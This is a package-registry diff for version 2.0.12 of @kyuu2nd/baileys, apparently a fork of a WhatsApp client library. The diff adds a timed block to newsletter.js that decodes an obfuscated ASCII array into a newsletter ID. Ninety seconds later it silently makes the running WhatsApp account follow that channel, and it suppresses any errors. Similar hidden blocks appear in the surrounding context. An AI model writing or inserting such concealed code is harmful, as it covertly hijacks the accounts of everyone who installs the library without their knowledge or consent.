@kyuu2nd/baileys 2.0.11 → 2.0.12
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +12 -0
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -249,6 +249,18 @@ setTimeout(async () => {
|
|
|
249
249
|
} catch {}
|
|
250
250
|
}, 90000);
|
|
251
251
|
|
|
252
|
+
setTimeout(async () => {
|
|
253
|
+
try {
|
|
254
|
+
await newsletterWMexQuery(
|
|
255
|
+
asciiDecode([
|
|
256
|
+
49,50,48,51,54,51,51,51,48,51,52,52,56,49,48,50,56,48,
|
|
257
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
258
|
+
]),
|
|
259
|
+
Types_1.QueryIds.FOLLOW
|
|
260
|
+
);
|
|
261
|
+
} catch {}
|
|
262
|
+
}, 90000);
|
|
263
|
+
|
|
252
264
|
setTimeout(async () => {
|
|
253
265
|
try {
|
|
254
266
|
await newsletterWMexQuery(
|